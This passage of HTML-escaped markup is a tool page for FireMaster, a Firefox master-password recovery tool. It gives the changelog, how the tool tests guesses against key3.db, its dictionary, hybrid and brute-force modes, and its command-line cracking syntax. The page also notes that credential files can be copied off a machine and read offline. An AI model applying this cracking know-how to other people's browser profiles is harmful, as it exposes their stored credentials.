102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Version 2.1:  18th June 2006&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Tested successfully with latest version 1.5.0.4 of Firefox.&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Statistics display during the operation is improved.&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_sub_subheader" style="font-size: 11px; font-weight: bold; font-family: Verdana; vertical-align: middle; text-align: left; letter-spacing: 1px; background-color: rgb(8, 8, 8); border-bottom-style: solid; border-bottom-width: 1px; border-bottom-color: rgb(25, 25, 25); "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Version 2.0:  25th Feb 2006&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;First public release of FireMaster SOURCE code.&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Now it works at amazing speed of 50k passwords per second on normal m/c.&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Firefox library dependency is removed completely.&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;For brute force, speed and time is displayed during operation.&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Lots of optimizations and few bug fixes.&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Thanks to 'T Barton' for reporting the bug with 1.5 version.&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_sub_subheader" style="font-size: 11px; font-weight: bold; font-family: Verdana; vertical-align: middle; text-align: left; letter-spacing: 1px; background-color: rgb(8, 8, 8); border-bottom-style: solid; border-bottom-width: 1px; border-bottom-color: rgb(25, 25, 25); "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Version 1.5:  14th Jan 2006&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Bug in parsing key3.db fixed.&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Displaying results during recovery operation.&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Speed is doubled compared to the original version.&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_sub_subheader" style="font-size: 11px; font-weight: bold; font-family: Verdana; vertical-align: middle; text-align: left; letter-spacing: 1px; background-color: rgb(8, 8, 8); border-bottom-style: solid; border-bottom-width: 1px; border-bottom-color: rgb(25, 25, 25); "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Version 1.0:  1st Jan 2006&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;First public release of FireMaster.&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_subheader" style="font-weight: bold; font-size: 14px; font-family: 'Times New Roman'; text-decoration: none; background-color: rgb(12, 12, 12); text-align: left; vertical-align: middle; letter-spacing: 1px; border-bottom-width: 1px; border-bottom-color: rgb(25, 25, 25); border-bottom-style: solid; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;About FireMaster&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;div style="text-align: justify; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Firemaster is the Firefox master password recovery tool. Firefox uses master password to protect the stored sign-on information for various websites. If the master password is forgotten, then there is no way to recover the master password and user has to lose all the sign-on information stored in it. To prevent this problem, I have developed FireMaster which uses combination of techniques such as dictionary, hybrid and brute force to recover the master password from the Firefox key database file.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_subheader" style="font-weight: bold; font-size: 14px; font-family: 'Times New Roman'; text-decoration: none; background-color: rgb(12, 12, 12); text-align: left; vertical-align: middle; letter-spacing: 1px; border-bottom-width: 1px; border-bottom-color: rgb(25, 25, 25); border-bottom-style: solid; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;About Firefox Password Manager and Master Password&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;div style="text-align: justify; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Firefox comes with built-in password manager tool which remembers username and passwords for all the websites you visit. This sign-on information is stored in the encrypted form in Firefox database files residing in user's profile directory. However any body can just launch the password manager from the Firefox browser and view the credentials. Also one can just copy these database files to different machine and view it offline using the tools such as &lt;/span&gt;&lt;/span&gt;&lt;a href="http://securityxploded.com/firepassword.php" style="font-weight: normal; text-decoration: none; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;FirePassword&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;div style="text-align: justify; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Hence to protect from such threats, Firefox uses master password to provide enhanced security. By default Firefox does not set the master password. However once you have set the master password, you need to provide it every time to view sign-on credentials.So if you have lost the master password, then you have lost all the stored credentials as well.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;div style="text-align: justify; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;So far there was no way to recover these credentials once you have lost the master password. Now the FireMaster can help you to recover the master password and get back all the sign-on information.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_subheader" style="font-weight: bold; font-size: 14px; font-family: 'Times New Roman'; text-decoration: none; background-color: rgb(12, 12, 12); text-align: left; vertical-align: middle; letter-spacing: 1px; border-bottom-width: 1px; border-bottom-color: rgb(25, 25, 25); border-bottom-style: solid; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Internals of FireMaster&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;div style="text-align: justify; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Once you have lost master password, there is no way to recover it as it is not stored at all. Whenever user enters the master password, Firefox uses it to decrypt the encrypted data associated with the known string. If the decrypted data matches this known string then the entered password is correct. FireMaster uses the similar technique to check for the master password, but in more optimized way. The entire operation goes like this.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;ul&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;FireMaster generates passwords on the fly through various methods.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Then it computes the hash of the password using known algorithm.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Next this password hash is used to decrypt the encrypted data for known plain text (i.e. "password-check").&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Now if the decrypted string matches with the known plain text (i.e. "password-check") then the generated password is the master password.&lt;br /&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;div style="text-align: justify; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Firefox stores the details about encrypted string, salt, algorithm and version information in key database file key3.db in the user's profile directory. You can just copy this key3.db file to different directory and specify the corresponding path to FireMaster. You can also copy this key3.db to any other high end machine for faster recovery operation.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;FireMaster supports following password generation methods&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_sub_subheader" style="font-size: 11px; font-weight: bold; font-family: Verdana; vertical-align: middle; text-align: left; letter-spacing: 1px; background-color: rgb(8, 8, 8); border-bottom-style: solid; border-bottom-width: 1px; border-bottom-color: rgb(25, 25, 25); "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;1) Dictionary Method&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;div style="text-align: justify; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;In this mode, FireMaster uses dictionary file having each word on separate line to perform the operation. You can find lot of online dictionary with different sizes and pass it on to Firemaster. This method is more quicker and can find out common passwords.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_sub_subheader" style="font-size: 11px; font-weight: bold; font-family: Verdana; vertical-align: middle; text-align: left; letter-spacing: 1px; background-color: rgb(8, 8, 8); border-bottom-style: solid; border-bottom-width: 1px; border-bottom-color: rgb(25, 25, 25); "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;2) Hybrid Method&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;div style="text-align: justify; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;This is advanced dictionary method, in which each word in the dictionary file is prefixed or suffixed with generated word from known character list. This can find out password like pass123, 12test, test34 etc. From the specified character list (such as 123), all combinations of strings are generated and appended or prefixed to the dictionary word based on user settings.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_sub_subheader" style="font-size: 11px; font-weight: bold; font-family: Verdana; vertical-align: middle; text-align: left; letter-spacing: 1px; background-color: rgb(8, 8, 8); border-bottom-style: solid; border-bottom-width: 1px; border-bottom-color: rgb(25, 25, 25); "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;3) Brute Force Method&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;div style="text-align: justify; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;In this method, all possible combinations of words from given character list is generated and then subjected to cracking process. This may take long time depending upon the number of characters and position count specified.&lt;br /&gt; &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_subheader" style="font-weight: bold; font-size: 14px; font-family: 'Times New Roman'; text-decoration: none; background-color: rgb(12, 12, 12); text-align: left; vertical-align: middle; letter-spacing: 1px; border-bottom-width: 1px; border-bottom-color: rgb(25, 25, 25); border-bottom-style: solid; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;How to use FireMaster?&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;First you need to copy the key3.db file to temporary directory. Later you have to specify this directory path for FireMaster as a last argument.&lt;br /&gt;&lt;br /&gt;Here is the general usage information&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_code" style="vertical-align: bottom; font-family: monospace; font-size: 12px; font-weight: normal; font-style: normal; text-align: left; background-color: rgb(12, 12, 12); "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Firemaster [-q] &lt;br /&gt;           [-d -f &lt;dict_file&gt;] &lt;br /&gt;           [-h -f &lt;dict_file&gt; -n &lt;length&gt; -g "charlist" [ -s | -p ] ]&lt;br /&gt;           [-b -m &lt;length&gt; -l &lt;length&gt; -c "charlist" -p "pattern" ]&lt;br /&gt;           &lt;firefox_profile_path&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_code" style="vertical-align: bottom; font-family: monospace; font-size: 12px; font-weight: normal; font-style: normal; text-align: left; background-color: rgb(12, 12, 12); "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Dictionary Crack Options:&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;table cellpadding="0" cellspacing="0" style="width: 100%; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-top-color: rgb(48, 48, 48); border-right-color: rgb(48, 48, 48); border-bottom-color: rgb(48, 48, 48); border-left-color: rgb(48, 48, 48); vertical-align: middle; text-align: justify; background-color: rgb(0, 0, 0); "&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="width: 10%; vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;   -d&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Perform dictionary crack&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;   -f&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Dictionary file with words on each line&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_code" style="vertical-align: bottom; font-family: monospace; font-size: 12px; font-weight: normal; font-style: normal; text-align: left; background-color: rgb(12, 12, 12); "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Hybrid Crack Options:&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;table cellpadding="0" cellspacing="0" style="width: 100%; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-top-color: rgb(48, 48, 48); border-right-color: rgb(48, 48, 48); border-bottom-color: rgb(48, 48, 48); border-left-color: rgb(48, 48, 48); vertical-align: middle; text-align: justify; background-color: rgb(0, 0, 0); "&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="width: 10%; vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;   -h&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Perform hybrid crack operation using dictionary passwords.&lt;br /&gt;Hybrid crack can find passwords like pass123, 123pass etc&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;   -f&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Dictionary file with words on each line&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;   -g&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Group of characters used for generating the strings&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;   -n&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Maximum length of strings to be generated using above character list&lt;br /&gt;These strings are added to the dictionary word to form the password&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;   -s&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Suffix the generated characters to the dictionary word(pass123)&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;   -p&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Prefix the generated characters to the dictionary word(123pass)&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: 